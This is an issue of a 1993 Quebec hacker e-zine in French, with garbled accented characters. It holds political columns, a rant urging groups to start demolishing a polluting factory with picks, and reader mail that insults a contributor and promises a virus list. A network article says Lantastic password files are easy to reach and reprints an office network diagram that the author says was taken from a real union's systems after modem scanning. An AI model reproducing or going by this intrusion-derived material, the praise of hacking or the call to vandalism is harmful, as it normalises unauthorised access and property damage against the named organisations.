garantit l'anonymat. C'est ainsi que, en Europe, sous l'occupation nazie,
les collabos d‚non‡aient les juifs.
La d‚lation, c'est le premier chaŒnon de l'tat policier.
L'id‚e - et il s'en vante - ‚mane de l'‚paisse cervelle du d‚put‚
conservateur de Duvernay, Vincent Della Noce, bien connu pour sa d‚fense
des "bedaines qu‚taines" de nos vill‚giateurs floridiens. Politiquement
adipeux, Della Noce.
Et suprˆmement malhonnˆte avec part ‡a. Pour justifier son initiative,
il la compare … Info-Crime, un programme qui invite les citoyens … assister
la police dans la recherche des criminels.
On voit o— il veut en venir, Valcourt: banaliser la d‚lation, en faire
un devoir civique, une obligation morale, susciter le frisson du h‚ros,
chez ceux qui sont des lƒches.
Malhonnˆte, parce que Info-Crime, c'est autre chose que la d‚lation.
C'est la police qui a d‚j… fait enquˆte, c'est l'‚vad‚ d‚j… condamn‚, c'est
le violeur dont on a perdu la trace. Ce n'est pas le ch“meur mis … la
misŠre par un cr‚tin de fonctionnaire bien bord‚ dans la douillette de sa
permanence.
Ou de sa pension de d‚put‚, comme Della Noce.
Les cons‚quences de la d‚lation? On va tourner les pauvres contre les
pauvres, parce que laissez-moi vous dire que les appels anonymes ne
viendront pas des hauteurs d'Outremont, mais des faubourgs du centre-sud.
Pas de Hamstead, mais de St-J‚rome.
Et cet inconscient de Valcourt, se rend-il compte qu'il va aussi
tourner ces bons Canadiens de souche contre tous ceux qui ont la peau
fonc‚e parce qu'il est acquis, n'est-ce pas, que ce sont les immigrants de
Ha‹ti et de Jama‹que et les Vietnamiens et les Chinois qui viennent ici
vivre au crochet de nos imp“ts?


- 30 -



Leeched from LA PRESSE - Lundi 15 f‚vrier 1993

LES PREDATEURS
par
Pierre Foglia

UNE LEPRE MDIOCRE

D‚j… embarrass‚s par l'impopulaire r‚forme de l'assurance-ch“mage, les
d‚put‚s conservateurs se sont d‚pˆch‚s de demander … Vincent Della Noce de
fermer sa gueule et sa ligne rouge. Pas assez vite toutefois. Della Noce
avait eu le temps de faire l'apologie de la d‚lation devant toutes les
cam‚ras du pays.
Sa brillante id‚e: une ligne rouge qui inviterait … d‚noncer
anonymement son voisin, son mononcle, son beau-frŠre, dŠs lors qu'on les
soup‡onnerait de frauder l'assurance-ch“mage.
"Ben quoi, qu'est-ce que vous avez contre ‡a?" s'est ‚tonn‚ le d‚put‚
de Duvernay. "Je l'ai d‚j… fait moi, Je suis pas mort!" Tu ne risquais rien
monsieur le d‚put‚. La m‚diocrit‚ n'est pas mortelle. La lŠpre non plus.

La d‚lation n'est pas autre chose: une m‚diocre lŠpre.

Doit-on d‚noncer le voisin qui maltraite ses enfants? Peut-ˆtre. AprŠs
l'avoir averti qu'on allait le faire. D‚noncer le systŠme aussi, et ses
repr‚sentants chaque fois qu'ils abusent de leur pouvoir. Pour moi la liste
s'arrˆte l….
Les voleurs, les trafiquants, les drogu‚s, les ‚vad‚s, les
terroristes, les faux r‚fugi‚s, les gens qui travaillent au noir, ceux qui
fraudent l'imp“t, ceux qui passant des trucs … la douane, ceux qui vont en
Floride avec leur assurance-ch“mage, compte jamais sur moi pour te le dire,
Della Noce.

Tu sais c'est quoi l'‚tat policier? Non, c'est pas quand la police est
au pouvoir. Ca c'est la dictature.
L'‚tat policier c'est quand une majorit‚ de citoyens se r‚veillent le
matin avec une ƒme de flic.

- 30 -

Malheureusement, plusieurs sysops de la r‚gion de Qu‚bec ont une ƒme de
flic... Ou alors se destineraient-ils … une carriŠre politique?
On aurait pu continuer ainsi les citations, et aller chercher Sir Winston
Churchill, par exemple, qui disait (… propos des collabos fran‡ais):

Les d‚lateurs "are the lowest lifeform known to man"

Et de par l'histoire, nous le savons tous, les d‚lateurs ont toujours
abond‚. Judas D'Iscariote lui-mˆme... Mais vous savez comment il a fini,
Judas...
Mais assez sur ce sujet, je crois que je vais vomir. On fera le point au
prochain num‚ro...

Ceci dit, nous croyons qu'avec ce num‚ro quatre, Northern Phun Co. vient
de trouver sa vitesse de croisiŠre. On regarde devant nous, et l'azur est
radieux! On regarde derriŠre nous, et il n'y a que quelques cabots qui
s'acharnent encore … s'entre-d‚chirer pour les restes de la chrysalide...

Vous avez d‚j… vu le film de Francis Ford Coppola, LE PARRAIN? Mon bout
pr‚f‚r‚, c'est quand le producteur se r‚veille un beau matin avec la tˆte
de son cheval pr‚f‚r‚ dans son lit! HaHaHa!

Stay with us, folks, 93 is gonna be a pretty good year!


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

BELL, PARTENAIRE EN AFFAIRES
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



LE FRANC PARLER DU VIEUX MEDEE

LOGE DE LA SUBVERSION

par
MERLIN L'EMMERDEUR



Vous ˆtes le symbole mˆme du bon et honnˆte citoyen.

Vous payez vos imp“ts avant le trente avril, vous achetez des obligations
d'‚pargne, vous allez voter r‚guliŠrement … tous les cinq ans pour le moins
pire, vous dormez prudemment, vous avez fait laminer votre m‚daille
d'ob‚issance.

Vous ˆtes un gentil citoyen!

Vous croyez … l'autorit‚, vous croyez … la loi et … l'ordre, vous croyez
que le pape est infaillible, vous croyez que Dieu est blanc et catholique,
vous croyez qu'au fond Robert Bourassa est ind‚pendantiste et qu'il a une
paire de couilles entre les jambes, vous croyez que le cardinal L‚ger ‚tait
plus saint que con, vous croyez que Joe Clark aurait mieux fait que John
Turner ou Brian Mulroney, vous croyez que Solange-Ca Pue-Rolland cessera
un jour de brailler comme une vache, vous croyez que Jeanne Sauv‚ a ‚t‚ une
grrrrrande canadienne, vous croyez qu'Elizabeth II chie de l'encens et de
la myrrhe, vous croyez que le gentilhomme … la verge noire m‚rite 110 mille
dollars par ann‚e, vous croyez que Jean Cr‚tin est capable d'avoir une id‚e
(mˆme intelligente), vous croyez qu'Andr‚ Arthur dit tout haut ce que tout
le monde pense tout bas, vous croyez que Baderne Powell et le baron de
Coubertin n'‚taient pas que vieux, snobs et cons, vous croyez que J.F.K.
‚tait un grand pr‚sident (informez-vous), vous croyez que Saddam Hussein
est une plus grande vermine que George Bush, vous croyez que les centrales
nucl‚aires sont s–res.

Vous ˆtes un gentil citoyen.

Vous croyez qu'un nouveau gouvernement va changer les choses, vous croyez
que les femmes au pouvoir feront mieux que les machos, vous croyez qu'on
apprend … lire et … ‚crire … l'‚cole, vous croyez que les m‚decins
pratiquent la m‚decine, que les avocats d‚fendent la veuve et l'orphelin,
vous croyez que Dieu a cr‚‚ l'homme … son image et … sa ressemblance, vous
croyez que les faux cons sont des oiseaux en voie de disparition.

Vous ˆtes un gentil citoyen.

Vous croyez que vous n'ˆtes pas responsables de la situation mardique dans
laquelle on se retrouve tous. Nous y reviendrons, mais avant jetons un coup
d'oeil sur ladite situation. Il ne faut pas insulter impun‚ment de la bonne
marde...

a) Les jeunes et les baleines se suicident. Les politiciens et les
s‚nateurs ne se suicident pas.

B) Rien ne va plus dans le bƒtiment, on manque de prisons.

C) La moiti‚ de nos lacs sont morts, les autres sont … moiti‚ morts.

D) Les usines ferment, les soupes populaires aussi.

E) La violence est partout, surtout au T‚l‚journal, … l'‚cole et … la
maternelle.

F) Les ‚rabliŠres meurent, les grenouilles aussi, les b‚lugas aussi, les
morues aussi, les truites aussi, les homards aussi, les crevettes
aussi, alouette.

G) Pour r‚pondre … la crise ‚conomique, Robert Bourassa ouvre des
casinos.

H) Sur chaque dollar gagn‚, il reste 15 cents en r‚el pouvoir d'achat.
Or, un sac de peanuts co–te 95 cents.

I) Nos vieilles ne tricotent plus, elles grattent des gratteux de Loto-
Qu‚bec.

J) C'est le retour de la Prohibition et Claude Elliot Ness Ryan.

K) Pour refroidir les sans-abris, on coupe les arbres. Le fonctionnaire
responsable est toujours vivant.

L) L'alternative … Brian Mulroney est Jean Cr‚tin.

M) On emprunte pour payer la dette nationale.

N) L'Irak doit se plier aux r‚solutions de George ONU Bush. Isra‰l n'est
pas tenu de se plier aux r‚solutions de l'ONU.

O) On a r‚alis‚, depuis 1940, 3066 exp‚riences nucl‚aires. On en fait
encore.

P) On quˆte pour construire des h“pitaux pour enfants canc‚reux. Les
enfants canc‚reux meurent quand mˆme, on leur paye un voyage …
Disneyland.

Q) Autrefois on naissait avec les gˆnes de ses parents. Aujourd'hui, on
naŒt avec la dette de ses parents ($70,000 dollars par tˆte).

R) Deux individus sur 10 sont ch“meurs, on exporte des billots … Ta‹wan,
on importe des cure-dents de Ta‹wan.

S) On exporte des vieux et leur pension en Floride. On importe des
cancers de la peau de Floride.

T) Triomphe de la haute technologie: comment transformer un fleuve
majestueux et 688,000 km de riviŠres en fosse septique.

U) On change des panneaux "stop" en panneaux "arrˆt", on change des
panneaux "arrˆt" en panneaux "stop", on change des...

V) La couche d'ozone d‚crisse, R‚al GiguŠre anime Jeopardy.

W) Dieu d‚teste les tapettes, le juge Bienvenue aussi, le sida aussi,
seuls les t‚l‚-preachers peuvent gu‚rir les sidatiques. Envoyez vos
dons … Billy...

X) On change les ch“meurs en BS, on change les BS en ch“meurs. On appelle
‡a: formation professionnelle, formation aux adultes, programme
SPRINT, etc.

Y) Depuis quarante ans, le taux de spermatozo‹de par centilitre de sperme
a diminu‚ de 50% (absolument v‚ridique). Si la tendance se maintient,
Radio-Canada annonce la fin de l'homo stupiditus pour l'an de grƒce
2033.

Z) Superman est mort et Zorro s'est recycl‚ dans la construction de
cabanons de jardin.


Voil… o— on en est


Et pourtant vous avez toujours ‚t‚ un bon petit citoyen respectueux des
lois et de l'autorit‚ l‚gitime.

Voil… pourquoi il faut de toute urgence d‚boulonner tous ces pas bons, tous
ces incapables, tous ces pitres, toutes ces andouilles et tous ces trou-du-
culs qui nous gouvernent.

Les tiŠdes diront que nous sommes tous coupables, qu'il ne faut pas
seulement blƒmer les politiciens, et qu'on a les lois qu'on m‚rite. Il y
a du vrai l…-dedans, mais commen‡ons par le commencement. Flushons d'abord
les pas bons puisqu'ils n'ont pas la d‚cence de se flusher eux-mˆmes.

Les mˆmes tiŠdes diront encore qu'il faut agir d‚mocratiquement. Un peuple
qui a vot‚ QUATRE FOIS pour Robert Bourassa ne fera jamais rien pour sauver
sa peau. C'est tout vu et class‚...

Voil… pourquoi il faut verser dans la subversion. Qu'il se lŠve, celui qui
a mieux … proposer!

----------

Comme d'habitude, je vous livre une petite anecdote avant de passer
au volet pratique de ce court expos‚.

Il y a quelques ann‚es (deux ou trois), une grosse compagnie du genre Sears
ou Eaton a ‚t‚ condamn‚e … une forte amende pour avoir escroqu‚ sa
clientŠle quant … la qualit‚ et … la nature des pierres (soi-disant)
pr‚cieuses qu'elle leur vendait. Quoique pondu en novembre, le jugement ne
fut rendu public que le 15 janvier suivant. Vous savez pourquoi? Pour ne
pas nuire aux affaires de la compagnie pendant la trŠs lucrative p‚riode
des Fˆtes. Moi, j'appelle ‡a de la complicit‚ aprŠs le fait. Les trŠs
honorables juges de la Cour Sup‚rieure de l'Ontario d‚tiendraient-ils des
blocs d'actions votantes dans la compagnie? Cela s'appelle "conflit
d'int‚rˆt". Beaucoup de politiciens ont perdu leur job pour ‡a, mais les
juges, dans ce systŠme, sont intouchables. Ils ont l'injure au tribunal
facile. Il n'y a rien de plus susceptible qu'un honorable juge. Par ici,
les juges r‚clament de faramineux salaires afin, disent-ils, d'‚chapper aux
influences INDSIRABLES (quelle ‚l‚gance pour d‚finir la corruption). Il
y a pourtant une autre fa‡on de s'assurer de l'int‚grit‚ de juges: dans
l'ex-URSS, on pendait les juges corrompus. sauf, bien s–r, s'il s'agissait
du gendre du secr‚taire-g‚n‚ral du PC, l'exception confirme la rŠgle...

Bref, revenons sur terre.

AprŠs des ann‚es d'efforts soutenus et ingrats, les mouvements ‚cologiques
obtiennent de bien maigres r‚sultats. Greenpeace et cie veulent que l'on
cesse de tuer les baleines et les dauphins, ils veulent que l'on cesse de
jeter notre marde et notre plutonium dans les mers, ils veulent ‚pargner
la derniŠre ‚pinette noire du continent. Press‚s par l'opinion publique,
comme ils en ont l'habitude, les politicaillards r‚cup‚rŠrent la vague en
lui enlevant toute signification. F‚briles comme des soubrettes en manque,
ils d‚crŠtent qu'il est d‚sormais interdit de fumer en dehors des fumoirs
autoris‚s et qu'il est obligatoire de tirer … bout portant sur les
contrevenants. Cinquante mille bonnes femmes occupant le poste de
directeure des ressources humaines (?) de toutes les entreprises du pays
partent en croisades, en guerres saintes. Ces pauvres types de Greenpeace
ne voulaient que sauver la planŠte...

Interdire la cigarette, c'est facile, ‡a ne co–te rien, et il n'est pas
n‚cessaire d'avoir des couilles au cul pour l'imposer. les ‚lecteurs sont
contents et la compagnie Tioxide (de Tracy) peut continuer … jeter 120
tonnes m‚triques d'acide dans le St-Laurent … tous les jours, 365 jours par
ann‚e. Des b‚lugas, ‡a ne vote pas: ils se contentent de crever, ces
ingrats...

Il n'y a rien … faire, dites-vous!

Non, il y a toujours quelque chose … faire et il faut le faire mˆme s'il
‚tait trop tard. De grƒce, les m“mes, ne soyez pas aussi cons que vos
vieux.

Voici, here is, mon plan (de nŠgre?). Il faut former une premiŠre cellule
de dix personnes. On appelle Environnement Qu‚bec qui nous apprend (?) que
le plus grand pollueur du coin est Daishowa, l'ex-Reed Paper, l'encore plus
ex-Anglo Pulp and Paper Co... On s'arrˆte chez le Rona de votre voisinage,
on achŠte chacun un pic et une pioche, on prend l'autobus et on se fait
d‚poser devant l'usine. Alors, on se met tranquillement … d‚molir un coin
de l'‚difice. videment, on aura pr‚venu la presse auparavant. videment,
on aura mˆme pas le temps d'arracher deux briques avant l'arriv‚e en force
des flics. On se laisse docilement arrˆter, tout le monde se d‚clare non-
coupable et tout le monde plaide la l‚gitime d‚fense, car il s'agit
vraiment de l‚gitime d‚fense: ces ordures nous empoisonnent l'eau et l'air.
Quelle est la diff‚rence avec le gars qui empoisonne sa belle-mŠre …
petites doses d'arsenic?

Il faut pr‚voir qu'un gars sur la gang sera sur le B.S. C'est lui qui
embauchera un avocat et c'est l,aide juridique qui paiera l'avocat. Au
pire, chacun ‚copera d'une amende et au mieux, il n'est pas exclu que nous
gagnions notre cause. Au besoin, nous ferons appel … la g‚n‚rosit‚ des gens
lucides pour constituer un fond de d‚fense. Si Greenpeace peut r‚colter 22
millions de dollars par ann‚e, pourquoi n'en obtiendrions-nous pas deux ou
trois mille?

Mais voici le plus beau de l'histoire: la tactique ne peut r‚ussir que si
elle fait boule de neige, et que d'autres groupes de dix personnes
embarquent dans l'affaire, pour suivre nos traces le lendemain, et le
surlendemain, et le jour d'aprŠs.

Le risque est minime, il suffit d'un peu de courage et de quelques heures
de libre. Nous aurons l'oreille des m‚dias, … nous de faire notre pub et
de d‚clencher une r‚action en chaŒne.

ATTENTION, nos pires ennemis dans cette affaire ne seront ni l'tat, ni la
grande industrie. Nos ennemis seront les travailleurs des usines cibl‚es.
Il y a encore des gens qui n'ont pas compris que l'on peut gagner sa vie
sans en mourir. Ces gens-l… se battront pour leur steak sans r‚aliser qu'…
MOYEN terme, ils tuent aussi leur propre chiares...

Par contre, si l'op‚ration r‚ussit, si une l‚gion d'‚coeur‚s se manifeste,
le systŠme judiciaire va vite se retrouver avec une masse de procŠs couteux
sur les bras: il leur faut … chaque fois faire une preuve pour ne r‚colter
qu'une minable amende. La presse est sur les dents, le systŠme craque. La
charge est lourde, les tribunaux sont paralys‚s, le Tr‚sor paie … la fois
pour la poursuite et la d‚fense. Comme lorsqu'il s'agit de d‚fendre la
cause des anglais devant la loi 101. Pour une fois, les politicaillards
ineptes devront bouger. Ils devront agir et vite. Il ne faut pas leur
laisser une seule seconde de r‚pit.

Ne croyez pas que les politicaillards de merde agiront sans se faire
pousser dans le cul. Conform‚ment … la perception populaire, un politicien
c'est de la merde: si cela n'‚tait pas vrai, il y a longtemps qu'ils
auraient fait quelque chose. La planŠte agonise, l'‚conomie se crache les
poumons, les pauvres mangent leurs bas, seuls les politiciens trou-du-culs
s'entˆtent … ne rien voir.

Voil… pourquoi la subversion est ESSENTIELLE!

Comme le dit l'oncle Sam, en pointant son grand doigt pas trŠs propre, tout
juste sorti du cul de l'attorney g‚n‚ral: Young men, la patrie a besoin de
vous,

Merlin L'Emmerdeur


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

BELL, DES GENS DE PAROLE
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



LE FACTEUR QUOTE TOUJOURS DEUX FOIS

Votre courrier


Encore une fois, cette semaine, nous ne publions que quelques lettres
‚parses, le corps des messages … NPC se retrouvant dans nos messageries
publiques, et donc accessible … tous. Cependant, certaines lettres
aboutissent tout de mˆme ici, soit pour la qualit‚ de la prose et/ou pour
la pertinence ou l'impertinence des remarques. Si vous voulez ˆtre publi‚s
dans NPC -le mensuel-, d‚brouillez-vous pour nous laisser quelque chose de
song‚!

La premiŠre lettre nous a ‚t‚ envoy‚e par, vous l'auriez devin‚ en la
lisant, M‚phisto.

------

Taxi! A la morgue, s.v.p

(Les extraits entre guillemets sont de l'auteur, THX 1138)

Ce texte, de THX 1138, d‚borde d'inepsies.
"... Northern Phun Co. ...cette ... gang de fous."
L'auteur, d'abord, traite l'‚quipe de Northern Phun Co. de gang de fous.
SchizophrŠne avanc‚, il en fait lui-mˆme partie.
"... tu essaies d'avoir le moins de contacts possible avec l'autre
r‚alit‚, celle qui t'attend sur le seuil de ta porte."
C'est la d‚finition mˆme de cette maladie mentale, la schizophr‚nie.
Rien dans la suite de ce texte ne va donc me surprendre.
L'auteur se replie sur sa petite r‚alit‚ mentale, le cyberspace, et
tout le reste n'existe plus.
Si les jeunes assassins du taxi s'‚taient adonn‚s … la t‚l‚matique,
ce meurtre n'aurait pas eu lieu. "Je gagerais mon modem qu'aucun de
ces 5 malfrats ne possŠde d'ordi et de modem." Donc, pour combattre
la criminalit‚ juv‚nile, vive l'informatique. Quel rapport!
Tout le monde sait qu'avant l'Šre informatique, cette criminalit‚
‚tait quasi inexistante.
Lisez la perle qui suit: "... la dissidence
‚lectronique, telle que pr“n‚e par NPC, PROTEGE en r‚alit‚ la population."
Si tous lisaient NPC, il n'y aurait plus de crimes...
Et encore: "...si ces comiques avaient lu NPC, il n'y aurait
pas eu cinq vies de gƒch‚es..." Un seul pouvait le tuer!
Ce qui est inacceptable, mˆme chez les NPCiens, j'ose le croire, c'est que
dans toute la suite du texte, l'auteur argumente que c'est correct de tuer
un chauffeur de taxi. Ils sont tous fascistes. Ils haissent tout le monde:
les Arabes, les Indiens, les Juifs, les Isra‚liens, les immigrants, les
jeunes, les femmes, les noirs, eux-mˆmes. Alors tuons les chauffeurs de
taxi. "D‚livrons-les de leurs souffrances."
L'auteur avoue qu'il est terroris‚ par la haine des chauffeurs de taxi.

Et c'est la faute … Andr‚ Arthur.

Ce n'est pas la faute … Andr‚ Arthur.
Tout ce que tu as racont‚ n'existe que dans ton pauvre cerveau.
Tu souffres de schizophr‚nie. S'il n'y avait que ‡a!
Tu es poss‚d‚ par la haine des adultes. Un malade de ton espŠce souffre de
tout ce qui repr‚sente le pŠre. La peur du pŠre, la haine du pŠre.
Tu n'as pas encore r‚gler ton complexe d'Oedipe. Pour la plupart des
jeunes, "... la pubert‚ suffit g‚n‚ralement … les remettre dans le droit
chemin..." Pour toi, ‡a n'a pas suffit.
Je ne demande qu'une chose: NPCiens, dans votre no 4, ne publiez pas les
‚crits d'un malade mental.

-------------------

Blitzkreig r‚pond:

T'as bien raison, Raoul. Nous n'avons que faire de la pr‚sence d'un
psychopathe dans nos rangs. Mental Floss et moi l'avons coinc‚ au
t‚l‚phone, et lui avons dit notre maniŠre de penser. Il est au courant que
ce num‚ro de NPC est consacr‚ aux bonnes actions qui peuvent ˆtre pos‚es
par les H/P, et il nous a promis de nous ‚crire quelque chose en ce sens-
l…...



----------------------------

SECTION : Northern Phun Co., #1530 (PRIVEE)
DATE : 19/02/93 19:52 (RECU LE 20/02/93 17:41)
DE : M. B.
A : Blitzkreig
SUJET : $$$$


Pourquoi pas ecrire sur: Tous les moyens de se servir de son ordi a des fin
monetaires$$$
Vaut-il la peine de caller LD
Un 14.4...ou un 300
Backdoor
Un autre virus mais en assembleur
Meilleurs virus disponibles sur le marche!
........

-----------------------

Blitz r‚pond:
Pour les virus, on a Jack Damme qui s'en vient de Montr‚al dŠs le prochain
num‚ro (un ex de NukE, je crois). Pour les moyens de faire des sous avec
les ordis... Le profit n'est pas notre principal motivateur... Vaut-il la
peine de caller LD: c'est s‚rieux, cette question? Les backdoors: il y a
bien d'autre chose … faire dans le HP que de trasher des boards, si tu veux
mon avis. Une liste des meilleurs virus sur le march‚: Ca c'est une BONNE
id‚e! On s'y met dŠs le prochain num‚ro!

C'est d‚j… tout pour le courrier... on va pas gonfler inutilement le mag
avec des messages ;-)


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

MERCI D'UTILISER L'INTERURBAIN BELL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



A LA QUEUE LEU-LEU

LA SCURIT DES RSEAUX

par
Blitzkreig



Que vous les appeliez LAN (Local Area Network), r‚seaux, ou OSI (Open
System Interconnection), c'est du pareil au mˆme. Les r‚seaux, c'est la
fa‡on qu'ont trouv‚ les compagnies pour g‚rer le travail de leurs employ‚s,
pour faciliter la communication entre les diff‚rents services (E-mail),
pour maximiser le rendement de l'investissement en ‚quipement informatique,
et pour uniformiser les m‚thodes de travail. Les r‚seaux se construisent
avec du hardware (les connecteurs Ethernet, par exemple), et avec du
software, que ce soit Novell ou Lantastic. Ce dernier soft, Lantastic, est
d'ailleurs le favori des hackers qui ont soif de systŠmes, car les files
contenant les mots de passe des usagers ainsi que leurs codes d'accŠs sont
plus facilement accessibles que sur n'importe quel autre logiciel. Les
r‚seaux ‚maillent la vie du praticien du H/P, car tu les retrouves partout:
… l'‚cole, … l'entreprise, dans la plupart des systŠmes gouvernementaux,
bref, ils sont incontournables.

DerniŠrement, l'un d'entre nous … d‚got‚, en scannant les 800 pour les
carriers, un systŠme bas‚ … Washington. L'entreprise s'appelait la UNITED
FOOD AND COMMERCIAL WORKERS UNION. On a d‚nich‚ dans leur banque de donn‚es
le diagramme de l'installation de leur r‚seau. Nous vous le pr‚sentons ici
… titre d'exemple, afin que vous vous fassiez une id‚e pr‚cise du
fonctionnement d'un r‚seau-modŠle au sein d'une entreprise.



Exemple d'‚tage - 7Š au 9Š plancher
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºPrinter Workstation Netport º
º ±±±±ÄÄÄÄÄÄÄÛÛÛÛÛÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÛÛÛÛÛÄÄIJ²²² º
º Workstation ³ ³ Shared º
º ÛÛÛÛÛÄÄÄÄÄÄÄÄÄÄÄÄÄ¿³ ³ Printer º
º Workstation ÚÁÁÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄ¿ º
º ±±±±ÄÄÄÄÄÄÄÛÛÛÛÛÄÄÄÄÄÄÄÄÄÄÄÄ´ RJ45 Patch ³ º
ºShared ³ Panel Rack Mount³ º
ºPrinter ÚÄ°°°°ÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÂÂÂÄÄÄÄÄÄÄÙ º
º ³ Xircom ³³³ º
ºLaptop ±±±²²± Concentrator ²²²²² º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍØÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Headquarters ³
Gateway ³ ±Voice
Server ³ ³ 4 lignes
±±±±±±±±± Concentrator ²²²²² ³
±±±±±±±±±ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³³³ ³
³ ³³³ ³
³ 5 ³³³ ³
Communications³ NetWare ³³³ Û Fax
Voice Modems servers ³ servers ³³³ Û Server
°ÄÄÄÄÄÄÛÄÄÄÄÄÄÄÄÄÄı±± ³ ±±± ³³³ ³
±±± ³ ±±± ³³³ ³
°ÄÄÄÄÄÄÛÄÄÄÄÄÄÄÄÄÄı±± ³ ±±± ³³³ ³
±±± ³ ±±± ÚÄÁÁÁÄÂÄÙ
°ÄÄÄÄÄÄÛÄÄÄÄÄÄÄÄÄÄı±± ³ ÀÄÄÄ´ RJ45³ Facility management
³ ÀÄÄÄÄÄÄÄ´PANEL³ Workstation
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄ°°°°
ÀÂÄÄÂÄÙ °°°°
±±±±±±ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³
±±±±±±ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛÛÛ T-1 ³ ÛÛ Tape
Gateway ³ ³ Backup
server ³ ÜÜÛÛÛÛÛÜÜ
³ Network Administration
